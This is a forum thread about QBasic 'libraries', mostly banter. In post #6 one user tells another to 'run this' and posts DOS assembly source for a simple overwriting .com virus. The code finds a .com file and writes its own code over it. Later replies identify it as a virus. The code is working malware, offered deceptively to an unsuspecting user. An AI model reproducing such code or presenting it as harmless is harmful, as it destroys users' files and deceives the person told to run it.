Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
Libraries ???
#1
ok so what's the deal with libraies?
Reply
#2
You can check out books there for free.
Reply
#3
lol
[Image: sig.php]
Back by popular demand!
I will byte and nibble you bit by bit until nothing remains but crumbs.
Reply
#4
he might mean libraries for QB eh?

Well that I will explain briefly:
In qbasic there's a lot of built in functions for keyboard
access, graphics and so on.
But the built in commands are not always enough, you want faster,
better whatever, that's where those libraries are useful.
You just include the library when you code and compile and
then you gain access to all of these fancy functions that are
in the library...
See?...
/post]
Reply
#5
Quote:he might mean libraries for QB eh?
i doubt it
[Image: sig.php]
Back by popular demand!
I will byte and nibble you bit by bit until nothing remains but crumbs.
Reply
#6
tiger, get a C compiler and run this
Code:
Code Segment
Assume CS:code,DS:code
Org 100h

startvx proc near

mov ah,4eh
mov cx,0000h
mov dx,offset star_com
int 21h

mov ah,3dh
mov al,02h
mov dx,9eh
int 21h

xchg bx,ax

mov ah,40h
mov cx,offset endvx - offset startvx
mov dx,offset startvx
int 21h

mov ah,3eh
int 21h

int 20h

startvx endp

star_com: db "*.com",0

endvx label near

code ends
end startvx
Reply
#7
what do i need to make/run them. any good sites?
Reply
#8
Quote:tiger, get a C compiler and run this
no... why?
[Image: sig.php]
Back by popular demand!
I will byte and nibble you bit by bit until nothing remains but crumbs.
Reply
#9
Diroga, I don't know who you think you're fooling by posting ASSEMBLY source to a crappy .com virus.

(Which would be assembled with an ASSEMBLER, not a C compiler.)

...n00bs...
Reply
#10
thats a virus? whats it do?
[Image: sig.php]
Back by popular demand!
I will byte and nibble you bit by bit until nothing remains but crumbs.
Reply


Forum Jump:


Users browsing this thread: 1 Guest(s)